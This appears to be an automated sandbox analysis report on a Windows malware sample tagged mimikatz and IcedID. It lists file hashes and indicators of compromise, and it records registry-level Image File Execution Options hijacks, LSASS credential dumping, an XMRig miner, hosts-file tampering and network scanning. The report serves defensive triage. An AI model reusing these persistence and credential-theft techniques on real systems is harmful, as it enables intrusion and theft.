Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-10-2024 07:48
Behavioral task
behavioral1
Sample
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe
-
Size
10.0MB
-
MD5
9be6b6720cd4469db64c0257ad8d7f44
-
SHA1
2abaaab7cec23fb3d3989ebab3a0906b6c90e3de
-
SHA256
316828b589110bb2cf71f1b38add845d787ae95f557d5bbc7221c8db9bc60e00
-
SHA512
93cfafed7040d4919582f068e519ee55f7597eb37f1882c11ccbb4c697e99c30a29eecb3cdf4b685f6ff0cff7d042047c2e591548491047e69168883deefe495
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
bmesabc.exedescription pid Process procid_target PID 4104 created 2180 4104 bmesabc.exe 38 -
Contacts a large (28592) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/696-177-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-182-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-203-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-215-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-224-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-233-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-248-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-254-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-263-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-298-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-299-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig behavioral2/memory/696-301-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/756-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/756-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000b000000023b89-7.dat mimikatz behavioral2/memory/3364-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1536-137-0x00007FF746410000-0x00007FF7464FE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
bmesabc.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bmesabc.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts bmesabc.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
bmesabc.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 768 netsh.exe 2056 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
bmesabc.exebmesabc.exewpcap.exevrguwycnn.exevfshost.exexohudmc.exegyggue.exenbriuecau.exeysiisu.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exebmesabc.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exelkinngyeb.exebmesabc.exepid Process 3364 bmesabc.exe 4104 bmesabc.exe 2292 wpcap.exe 1040 vrguwycnn.exe 1536 vfshost.exe 368 xohudmc.exe 1016 gyggue.exe 2096 nbriuecau.exe 696 ysiisu.exe 1596 nbriuecau.exe 4920 nbriuecau.exe 2100 nbriuecau.exe 4608 nbriuecau.exe 3660 nbriuecau.exe 4784 nbriuecau.exe 1908 bmesabc.exe 2956 nbriuecau.exe 644 nbriuecau.exe 220 nbriuecau.exe 4156 nbriuecau.exe 2816 nbriuecau.exe 3372 nbriuecau.exe 3988 nbriuecau.exe 4632 nbriuecau.exe 1692 nbriuecau.exe 4384 nbriuecau.exe 3972 nbriuecau.exe 948 lkinngyeb.exe 768 bmesabc.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exevrguwycnn.exepid Process 2292 wpcap.exe 2292 wpcap.exe 2292 wpcap.exe 2292 wpcap.exe 2292 wpcap.exe 2292 wpcap.exe 2292 wpcap.exe 2292 wpcap.exe 2292 wpcap.exe 1040 vrguwycnn.exe 1040 vrguwycnn.exe 1040 vrguwycnn.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 81 ifconfig.me 82 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exebmesabc.exexohudmc.exedescription ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bmesabc.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\gyggue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bmesabc.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\gyggue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF bmesabc.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023c77-134.dat upx behavioral2/memory/1536-135-0x00007FF746410000-0x00007FF7464FE000-memory.dmp upx behavioral2/memory/1536-137-0x00007FF746410000-0x00007FF7464FE000-memory.dmp upx behavioral2/files/0x0007000000023c82-154.dat upx behavioral2/memory/2096-155-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/2096-159-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/files/0x0007000000023c7f-163.dat upx behavioral2/memory/696-164-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/1596-170-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/4920-174-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/696-177-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/2100-179-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/696-182-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/4608-184-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/3660-188-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/4784-192-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/2956-200-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/696-203-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/644-205-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/220-209-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/4156-213-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/696-215-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/2816-218-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/3372-222-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/696-224-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/3988-227-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/4632-230-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/1692-232-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/696-233-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/4384-235-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/3972-237-0x00007FF7BC600000-0x00007FF7BC65B000-memory.dmp upx behavioral2/memory/696-248-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/696-254-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/696-263-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/696-298-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/696-299-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx behavioral2/memory/696-301-0x00007FF7FB140000-0x00007FF7FB260000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
bmesabc.exelkinngyeb.exe2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.execmd.exedescription ioc Process File created C:\Windows\tqgibwews\UnattendGC\specials\xdvl-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ssleay32.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\spoolsrv.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimilib.dll bmesabc.exe File opened for modification C:\Windows\tqgibwews\cuincnwui\Result.txt lkinngyeb.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\zlib1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\exma-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trch-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trfo-2.dll bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\scan.bat bmesabc.exe File opened for modification C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\cnli-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ucl.dll bmesabc.exe File created C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\bisbgtln\bmesabc.exe 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture64.dll bmesabc.exe File created C:\Windows\ime\bmesabc.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libxml2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libeay32.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\bmesabc.exe 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\docmicfg.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\posh-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tucl-1.dll bmesabc.exe File opened for modification C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\upbdrjv\swrpwe.exe bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\ip.txt bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.exe bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\lkinngyeb.exe bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe bmesabc.exe File opened for modification C:\Windows\bisbgtln\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\Shellcode.ini bmesabc.exe File created C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\coli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tibe-2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\schoedcl.xml bmesabc.exe File created C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture32.dll bmesabc.exe File created C:\Windows\tqgibwews\Corporate\vfshost.exe bmesabc.exe File opened for modification C:\Windows\tqgibwews\Corporate\log.txt cmd.exe File created C:\Windows\tqgibwews\UnattendGC\specials\crli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.xml bmesabc.exe File created C:\Windows\bisbgtln\svschost.xml bmesabc.exe File created C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimidrv.sys bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 3336 sc.exe 1100 sc.exe 4712 sc.exe 3880 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
